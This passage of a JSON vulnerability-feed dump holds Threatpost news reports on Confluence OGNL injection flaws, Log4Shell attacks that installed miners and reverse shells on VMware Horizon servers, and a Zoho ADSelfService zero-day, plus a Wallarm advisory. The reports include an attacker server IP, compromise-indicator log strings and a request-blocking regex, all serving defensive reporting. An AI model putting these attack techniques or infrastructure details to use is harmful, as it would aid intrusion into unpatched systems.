Anonymous and the Low Orbit Ion Cannon, DragonForce weaponizes their own open source DoS tools \u2013 Slowloris, DDoSTool, DDoS-Ripper, Hammer, and more \u2013 in choreographed, flashy website defacements.\n\nSome members, \u201cover the last year, have demonstrated the ability and desire to evolve into a highly sophisticated threat group.\u201d Among other things, that\u2019s included leveraing publicly disclosed vulnerabilities. In OpsPatuk, for example, they\u2019ve been working with the recently discovered [CVE-2022-26134](<https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/>).\n\n\u201cDragonForce Malaysia and its associates have proven their ability to adapt and evolve with the threat landscape in the last year,\u201d concluded the authors. With no signs of slowing down, \u201cRadware expects DragonForce Malaysia to continue launching new reactionary campaigns based on their social, political, and religious affiliations in the foreseeable future.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T13:59:37", "type": "threatpost", "title": "DragonForce Gang Unleash Hacks Against Govt. of India", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T13:59:37", "id": "THREATPOST:8C179A769DB315AF46676A862FC3D942", "href": "https://threatpost.com/hackers-india-government/179968/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-07T16:21:15", "description": "A just-patched, critical remote code-execution (RCE) vulnerability in the Atlassian Confluence server platform is suffering wide-scale exploitation, the Feds have warned \u2013 as evidenced by an attack on the popular Jenkins open-source automation engine.\n\nAtlassian Confluence is a collaboration platform where business teams can organize its work in one place: \u201cDynamic pages give your team a place to create, capture, and collaborate on any project or idea,\u201d according to [the website](<https://www.atlassian.com/software/confluence/guides/get-started/confluence-overview>). \u201cSpaces help your team structure, organize and share work, so every team member has visibility into institutional knowledge and access to the information they need to do their best work.\u201d\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn other words, it can house a treasure trove of sensitive business information as well as supply-chain information that could be used for follow-on attacks on partners, suppliers and customers.\n\n## **Jenkins Hack \u2013 Just a Cryptomining Hit**\n\nFor its part, Jenkins identified a \u201csuccessful attack against our deprecated Confluence service,\u201d it said in [a statement](<https://www.jenkins.io/blog/2021/09/04/wiki-attacked/>) over the weekend. Thankfully, \u201cwe have no reason to believe that any Jenkins releases, plugins or source code have been affected,\u201d the team added.\n\nThe attackers were able to exploit the bug in question ([CVE-2021-26084](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26084>)) to install a Monero cryptominer in the container running the service, according to the statement \u2013 no cyberespionage in this case. The team took the server offline immediately and rotated all passwords, and there\u2019s no plan to bring Confluence back, it said.\n\n\u201cAn attacker would not be able to access much of our other infrastructure,\u201d the statement continued, adding that the server hasn\u2019t been used in daily operations since late 2019. \u201cConfluence did integrate with our integrated identity system which also powers Jira, Artifactory, and numerous other services.\u201d\n\nThe hack comes on the heels of an urgent pre-Labor Day warning from U.S. Cybercommand that the flaw is firmly in the sites of cybercriminals aiming at U.S. businesses, less than 10 days after it was disclosed on August 25:\n\n> Mass exploitation of Atlassian Confluence CVE-2021-26084 is ongoing and expected to accelerate. Please patch immediately if you haven\u2019t already\u2014 this cannot wait until after the weekend.\n> \n> \u2014 USCYBERCOM Cybersecurity Alert (@CNMF_CyberAlert) [September 3, 2021](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283?ref_src=twsrc%5Etfw>)\n\nIt\u2019s a finding that echoes researchers from Bad Packets, who said [via Twitter](<https://twitter.com/bad_packets/status/1433157632370511873>) that it began to see mass scanning and exploitation for CVE-2021-26084 around Sept. 1.\n\nOn Tuesday, Japan-CERT [issued guidance](<https://www.jpcert.or.jp/english/at/2021/at210037.html>) that active exploits were being deployed in Japan as well.\n\n## **RCE with CVE-2021-26084**\n\nThe bug is an Object-Graph Navigation Language (OGNL) injection vulnerability that affects Confluence Server and Data Center (affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5). OGNL it is an expression language for getting and setting properties of Java objects, which can be used to create or change executable code.\n\nIn some cases, an unauthenticated attacker could execute arbitrary code on a computer running a Confluence Server or Data Center instance \u2013 which earned the issue a critical 9.8 out of 10 rating on the CVSS vulnerability-rating scale.\n\n\u201cIf the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems,\u201d [explained](<https://unit42.paloaltonetworks.com/cve-2021-26084/>) researchers at Palo Alto Networks, who also confirmed the exploitation activity.\n\nKaspersky researchers explained that the vulnerability is only usable for unauthenticated RCE if the option _\u201c_Allow people to sign up to create their account_\u201d _is active.\n\n\u201cSeveral proof-of-concepts for exploiting it, including a version that permits RCE, are already available online,\u201d Kaspersky noted [in its writeup](<https://www.kaspersky.com/blog/confluence-server-cve-2021-26084/41635/>), issued Monday.\n\nAtlassian [has released updates](<https://www.atlassian.com/software/confluence/download-archives>) for versions 6.13.23, 7.4.11, 7.11.6, 7.12.5 and 7.13.0. The bug doesn\u2019t affect Confluence Cloud users.\n\n## **Atlassian\u2019s Summer of Security Woes **\n\nIn July, Atlassian patched a serious flaw in its Jira platform, which is a proprietary bug-tracking and agile project-management tool used for software development. It\u2019s often tied to ([PDF](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/23175805/Atlassian-ATO-CPR-blog-FINAL.pdf>)) the Confluence platform through single sign-on (SSO) capabilities.\n\nThe issue tracked as CVE-2020-36239 could enable remote, unauthenticated attackers to execute arbitrary code in some Jira Data Center products, thanks to a missing authentication check in Jira\u2019s implementation of Ehcache, which is an open-source, Java distributed cache for general-purpose caching.\n\n\u201cCVE-2020-36239 can be remotely exploited to achieve arbitrary code execution and will likely be of great interest to both cybercriminals and nation-state-associated actors,\u201d Chris Morgan, senior cyber-threat intelligence analyst at digital-risk provider Digital Shadows, [said at the time](<https://threatpost.com/atlassian-critical-jira-flaw/168053/>). He pointed to several recent supply-chain attacks, including attacks against software providers Accellion and Kaseya, that have leveraged vulnerabilities to gain initial access and to compromise software builds \u201cknown to be used by a diverse client base.\u201d\n\nEarlier, in June, researchers uncovered a chain of Atlassian bugs that [could be tied together](<https://threatpost.com/atlassian-bugs-could-have-led-to-1-click-takeover/167203/>) for one-click information disclosure from Jira accounts. Sensitive information could have been easily siphoned out of the platform, researchers at Check Point Research said: \u201cAnything related to managing a team or writing\u2026code that you can encounter bugs in.\u201d\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {}, "published": "2021-09-07T16:07:58", "type": "threatpost", "title": "Jenkins Hit as Atlassian Confluence Cyberattacks Widen", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-36239", "CVE-2021-26084"], "modified": "2021-09-07T16:07:58", "id": "THREATPOST:042D7C606FEB056B462B0BFB61E59917", "href": "https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-29T20:34:59", "description": "What researchers are calling a \u201chorde\u201d of miner bots and backdoors are using the [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) bug to take over vulnerable VMware Horizon servers, with threat actors still actively waging some attacks.\n\nOn Tuesday, Sophos [reported](<https://news.sophos.com/en-us/2022/03/29/horde-of-miner-bots-and-backdoors-leveraged-log4j-to-attack-vmware-horizon-servers/>) that the remote code execution (RCE) Log4j vulnerability in the ubiquitous Java logging library is under active attack, \u201cparticularly among cryptocurrency mining bots.\u201d Besides cryptominers, attackers are also prying open Log4Shell to deliver backdoors that Sophos believes are [initial access brokers](<https://threatpost.com/zebra2104-initial-access-broker-malware-apts/176075/>) (IABs) that could lay the groundwork for later ransomware infections.\n\n## History of Log4Shell Nightmare-ware\n\nThe Log4j flaw was discovered in December, vigorously attacked within hours of its discovery and subsequently dubbed Log4Shell. Sophos\u2019s findings about VMware Horizon servers being besieged by threat actors leveraging the bug is in keeping with what\u2019s been happening since then: In fact, cyberattacks [increased](<https://threatpost.com/cyber-spike-attacks-high-log4j/177481/>) 50 percent YoY in 2021, peaking in December, due to a frenzy of Log4j exploits.\n\nWith [millions](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) of Log4j-targeted attacks clocking in per hour since the flaw\u2019s [discovery](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>), within just a few weeks, there was a record-breaking peak of 925 cyberattacks per week per organization, globally, as Check Point Research (CPR) [reported](<https://blog.checkpoint.com/2022/01/10/check-point-research-cyber-attacks-increased-50-year-over-year/>) in early January.\n\nLog4Shell has been a nightmare for organizations to hunt down and remediate, given that the flaw affected hundreds of software products, \u201cmaking it difficult for some organizations to assess their exposure,\u201d noted Sophos researchers Gabor Szappanos and Sean Gallagher in Tuesday\u2019s report. In other words, some outfits don\u2019t necessarily know if they\u2019re vulnerable.\n\n## Why Attackers Have Zeroed in on Horizon\n\nIn particular, those attacks have included ones targeting vulnerable [VMware Horizon](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) servers: a platform that serves up virtual desktops and apps across the hybrid cloud. These servers have been important tools in organizations\u2019 arsenals over the past few years, given that the pandemic triggered the necessity to provide work-from-home tools, the researchers pointed out.\n\nAlthough VMware [released](<https://kb.vmware.com/s/article/87073>) patched versions of Horizon earlier this month \u2013 on March 8 \u2013 many organizations may not have been able to deploy the patched version or apply workarounds, if they even know that they\u2019re vulnerable to begin with.\n\n\u201cAttempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature,\u201d Sophos said.\n\nEven those organizations that have applied the patches or workarounds may have been already compromised in other ways, given the backdoors and reverse-shell activity Sophos has tracked, the researchers cautioned.\n\nIn late December and January, VMWare\u2019s Horizon servers with Log4Shell vulnerabilities came under [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) attack, as [flagged](<https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike>) by researchers at Huntress. Other [ attacks](<https://twitter.com/GossiTheDog/status/1484145056198053891>) included those that [installed web shells](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nThose attacks used the Lightweight Directory Access Protocol (LDAP) resource call of Log4j to retrieve a malicious Java class file that modified existing, legitimate Java code, injecting a web shell into the VM Blast Secure Gateway service and thereby granting attackers remote access and code execution. Sophos has seen these attacks show up in customer telemetry since the beginning of January, the researchers said.\n\nThe attacks against Horizon servers grew throughout January. Beyond attempts to deploy cryptocurrency-mining malware, other attacks were potentially designed either to grant threat actors initial access or to infect targets with ransomware, Sophos said. Such attacks have continued into this month: the security firm shared a bar chart, shown below, that shows the ebb and flow of the attacks that have bled into mid-March.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/29124520/attack-horizon-e1648572335942.jpg>)\n\nVMware Horizon server attacks since the beginning of January. Source: Sophos.\n\n\u201cThe largest wave of Log4J attacks aimed at Horizon that we have detected began January 19, and is still ongoing,\u201d the researchers said.\n\nBut this wave hasn\u2019t relied on the use of one of cybercrooks\u2019 favorite tools, Cobalt Strike: a commercial penetration-testing tool that can be used to deploy beacons on systems in order to simulate attacks and test network defenses.\n\nRather, \u201cthe cryptominer installer script is directly executed from the Apache Tomcat component of the Horizon server,\u201d Sophos said, with the most frequently used server in the campaigns being 80.71.158.96.\n\n## The Payloads\n\nSophos found a slew of miners being dumped on targeted Horizon servers, including z0Miner, the JavaX miner and at least two variants \u2013 the Jin and Mimu cryptocurrency miner bots \u2013 of the XMRig commercial cryptominer,. Speaking of which, Uptycs reported in January that cryptojackers had figured out how to [inject XMRig](<https://threatpost.com/cybercriminals-vmware-vsphere-cryptominers/177722/>) into VMware\u2019s vSphere services, undetected. For its part, back in September 2021, Trend Micro [found](<https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html>) that z0Miner operators were exploiting the [Atlassian Confluence RCE](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) (CVE-2021-26084) for cryptojacking attacks.\n\nSophos also found several backdoors, including several legitimate testing tools. One such was implants of Sliver: a tool used by red teams and penetration testers to emulate adversarial tactics. Sliver showed up as a precursor to the Jin miner in all the cases where Sophos was able to investigate further, leading the researchers to suspect that it\u2019s actually the payload. Either that, or maybe the actor behind Sliver might be a ransomware gang, the researchers hypothesized, given that the same servers deploying Sliver also hosted files to deliver the Atera agent as a payload.\n\nAtera is another common, legitimate remote monitoring and management tool. However, the threat actors aren\u2019t attacking existing Atera installations, per se, the researchers said. Rather, \u201cthey install their own Atera agents in order to use the Atera cloud management infrastructure to deploy additional payloads in the future,\u201d they explained.\n\nSophos also found the legitimate Splashtop Streamer remote-access tool being downloaded and installed on infected systems, \u201cprobably as an automated task for the new clients.\u201d\n\nAs well, there were several PowerShell-based reverse shells in the payload mix that had been dropped by the Log4Shell exploits.\n\n## Two Types of Reverse Shells\n\nSophos found two types of reverse shell: one, a shorter script that opens a socket connection to a remote server and executes the received buffer, which is supposed to be a PowerShell command.\n\nThey also found a larger variant of a reverse shell: one that can reflectively load a Windows binary, with the loader as an encrypted and base64 encoded blob, as depicted below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/29155214/Base64_encoded_blob-e1648583546965.jpg>)\n\nBase64 encoded blob. Source: Sophos.\n\nSophos telemetry showed that while z0Miner, JavaX and some other payloads were downloaded directly by the web shells that had been used for initial compromise, the Jin bots were tied to use of Sliver and used the same wallets as Mimo, \u201csuggesting these three malware were used by the same actor,\u201d Sophos said. Researchers believe that Jin is, in fact, \u201csimply a rebranded version of Mimo.\u201d\n\n## Loads of New Malware Loaders\n\nNew malware loaders are springing up like dandelions in the spring. Besides the ones covered by Sophos in Tuesday\u2019s report, security researchers at Symantec today also published a technical[ report](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUeZY5vOK6hHL-2FZQIhe5-2B4JVOehUh4Rb8p3ey37Q9OVEIiWGDSjejxPvkb8ovY0h-2FaWB9dvcXCl3SBCFSEuV5tcRGFsPYlsbDvD-2BUBbuZrpjG-2F3o76yv-2FjW7fnR-2BbuAqcTKlC8Ql3vteVWIz1-2F4jQ39BlDgn8Ze7x-2FjjxdfusIUCoWeHw_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTf4msXI8najxJ51o4YJVhtdqJKuSTmaXDsB1uynL70vmZixJBnwPhKCug0sz-2BmD22NzQdTPN5KP9W-2FB8FFI76ksSSNzbmCCaVViVDpzZ8413vH2SK7hoc-2F9PgDFHE5nPDuAWqJnV7-2B1m3omM9hPkKC6f0TGhlnK7L2Rm0UV3m4RfnEylMOpa8zOk3ZpTlH4NHB441qOzaGmeusjrgk12h1-2FHBCuMABwcfwmdXp6d8OUxE-3D>) on a new malware loader tracked as Verblecon that\u2019s escaped detection due to the polymorphic nature of its code.\n\nVerblecon has likewise been seen in attacks that install cryptocurrency miners on compromised machines.\n\nSaryu Nayyar, CEO and founder of[ Gurucul](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUemyDumHlbVHpjKINAYc3Jk-3DThvL_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTf4msXI8najxJ51o4YJVhtdqJKuSTmaXDsB1uynL70vmZixJBnwPhKCug0sz-2BmD22NzQdTPN5KP9W-2FB8FFI76ksRzfCH77Y1C4pRGOycTIJafHsN-2B4KnSygPf4489ZnosIN0CloPhQCESwF4k9NfwdKmZsgKHx6JGWXjEVL3UpRuh84NABjevUYJLlxFeyFD2KR14VLhnCySOfOl1QNCbp-2F2Vu3lWjuUOLb0td2Dh5r3I-3D>), told Threatpost that in order to fight the legitimate assessment tools being used to breach organizations, it\u2019s also \u201ccritical\u201d to employ sophisticated technologies \u2013 namely, self-training machine learning and behavioral models \u2013 to sniff out exploitation of exposed vulnerabilities as well as to detect the remote surveillance done by attackers with tools such as Cobalt Strike, et al.\n\n\u201cCurrent [extended detection and response, or XDR] and traditional [security information and event management, or SIEM] solutions, even with claims of User Entity Behavior Analytics rooted in known patterns and rule-based artificial intelligence, are unable to adapt to these methods,\u201d she told Threatpost via email. \u201cOrganizations need to invest in solutions that employ transparent non rule-based machine learning models to more rapidly identify new attacks.\u201d\n\nChris Olson, CEO of digital safety platform The Media Trust, told Threatpost on Tuesday that polymorphic techniques \u201care just another way to hide malicious intentions, along with checks for security tools and live environments.\u201d\n\nThis attack provides another example of how the risks of Web 2.0 are being replicated in Web 3.0, he said via email.\n\n\u201cToday\u2019s embryonic beginnings of Web 3.0 are eerily reminiscent of the Web as it existed in the 1990s, showing sporadic signs of vulnerability that may well foreshadow a future era of cyber chaos,\u201d Olson said.\n\nTo prevent that from happening, we must learn from our past mistakes, he warned. \u201cToday\u2019s digital ecosystem is riddled with threats because Web 2.0 was not designed for cybersecurity from the outset. Untrusted third parties were allowed to proliferate, leading to phishing attacks, malicious advertising, rampant data privacy abuse and other threats that are hard to fix in the present. With Web 3.0, we have a chance to account for potential attack vectors by design \u2013 otherwise, the same issues will replicate themselves with greater potency than ever.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T20:33:08", "type": "threatpost", "title": "Log4JShell Used to Swarm VMware Servers with Miners, Backdoors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2022-03-29T20:33:08", "id": "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "href": "https://threatpost.com/log4jshell-swarm-vmware-servers-miners-backdoors/179142/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T15:34:54", "description": "A critical security vulnerability in the Zoho ManageEngine ADSelfService Plus platform could allow remote attackers to bypass authentication and have free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe issue (CVE-2021-40539) has been actively exploited in the wild as a zero-day, according to the Cybersecurity and Infrastructure Security Agency (CISA).\n\nZoho issued a patch on Tuesday, and CISA [warned that](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) admins should not only apply it immediately, but also ensure in general that ADSelfService Plus is not directly accessible from the internet. The issue affects builds 6113 and below (the fixed version is 6114).\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) solution for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\n\u201cUltimately, this underscores the threat posed to internet-facing applications,\u201d Matt Dahl, principal intelligence analyst for Crowdstrike, [noted](<https://twitter.com/voodoodahl1/status/1435673342925737991>). \u201cThese don\u2019t always get the same attention as exploit docs with decoy content, but the variety of these web-facing services gives actors lots of options.\u201d\n\nThis isn\u2019t Zoho\u2019s first zero-day rodeo. In March 2020, [researchers disclosed](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) a zero-day vulnerability in Zoho\u2019s ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones and more from a central location. The critical bug ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>), with a CVSS score of 9.8) allowed an unauthenticated, remote attacker to gain complete control over affected systems \u2013 \u201cbasically the worst it gets,\u201d researchers said at the time.\n\n## **Authentication Bypass and RCE**\n\nThe issue at hand is an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus, which could lead to remote code execution (RCE), according to Zoho\u2019s [knowledge-base advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>).\n\n\u201cThis vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,\u201d according to the firm. \u201cThis would allow the attacker to carry out subsequent attacks resulting in RCE.\u201d\n\nEchoing CISA\u2019s assessment, Zoho also noted that \u201cWe are noticing indications of this vulnerability being exploited.\u201d The firm characterized the issue as \u201ccritical\u201d although a CVSS vulnerability-severity rating has not yet been calculated for the bug.\n\nFurther technical details are for now scant (and no public exploit code appears to be making the rounds \u2014 yet), but Dahl noted that the zero-day attacks have been going on for quite some time:\n\n> Observed exploitation of this vuln _before_ CVE-2021-26084 (Atlassian Confluence) which got a lot of attention last week. Some very general observations:\n> \n> 1/ <https://t.co/rIfxxeBlmO>\n> \n> \u2014 Matt Dahl (@voodoodahl1) [September 8, 2021](<https://twitter.com/voodoodahl1/status/1435673338693754886?ref_src=twsrc%5Etfw>)\n\nHowever, he said that the attacks have thus far been highly targeted and limited, and possibly the work of a single (unknown, for now) actor.\n\n\u201cActor(s) appeared to have a clear objective with ability to get in and get out quickly,\u201d he tweeted.\n\nHe also noted similarities to the attacks taking place on Atlassian Confluence instances (CVE-2021-26084), which also started out as limited and targeted. However, in that case, researchers were able to \u201crapidly produce\u201d a PoC exploit, he pointed out, and eventually there was proliferation to multiple targeted-intrusion actors, usually resulting in cryptomining activity ([as seen in](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) the recent Jenkins attack).\n\nAtlassian Confluence, like AD SelfService Plus, allows centralized cloud access to a raft of sensitive corporate information, being a collaboration platform where business teams can organize their work in one place.\n\n## How to Know if Zoho AD SelfService Plus is Vulnerable\n\nUsers can tell if they\u2019ve been affected by taking a gander at the \\ManageEngine\\ADSelfService Plus\\logs folder to see if the following strings are found in the access log entries:\n\n * /RestAPI/LogonCustomization\n * /RestAPI/Connection\n\nZoho also said that users will find the following files in the ADSelfService Plus installation folder if running a vulnerable version:\n\n * cer in \\ManageEngine\\ADSelfService Plus\\bin folder.\n * jsp in \\ManageEngine\\ADSelfService Plus\\help\\admin-guide\\Reports folder.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T12:58:48", "type": "threatpost", "title": "Zoho ManageEngine Password Manager Zero-Day Gets Fix", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189", "CVE-2021-26084", "CVE-2021-40539"], "modified": "2021-09-09T12:58:48", "id": "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "href": "https://threatpost.com/zoho-password-manager-zero-day-attack/169303/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "wallarmlab": [{"lastseen": "2022-06-14T17:59:22", "description": "We want to share this update regarding the critical Confluence 0-day vulnerability (CVE-2022-26134).\n\nOn June 02, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution ([RCE](<https://www.wallarm.com/what/the-concept-of-rce-remote-code-execution-attack>)) vulnerability. Exploits are already publicly available and we expect this vulnerability to be heavily exploited in the wild.\n\nWe tested Wallarm\u2019s attack detection against the known exploit and confirmed that exploitation attempted are successfully detected and blocked. No further actions are required.\n\nTo mitigate the vulnerability when working in a monitoring mode, it\u2019s recommended to create a virtual patch rule based on Confluence recommendation. This rule will block any requests that contain a string ${ in the URI.\n\nYou can create the rule by yourself using the example below or contact our support team in case you want us to create the rule. The regex: [$][{]\n\nFeel free to reach out to support@wallarm.com if you need assistance.\n\nFurther updates will be published in Wallarm Changelog: <https://changelog.wallarm.com>\n\nThe post [Update on the Confluence 0-day vulnerability (CVE-2022-26134)](<https://lab.wallarm.com/update-on-the-confluence-0-day-vulnerability-cve-2022-26134/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T20:50:59", "type": "wallarmlab", "title": "Update on the Confluence 0-day vulnerability (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 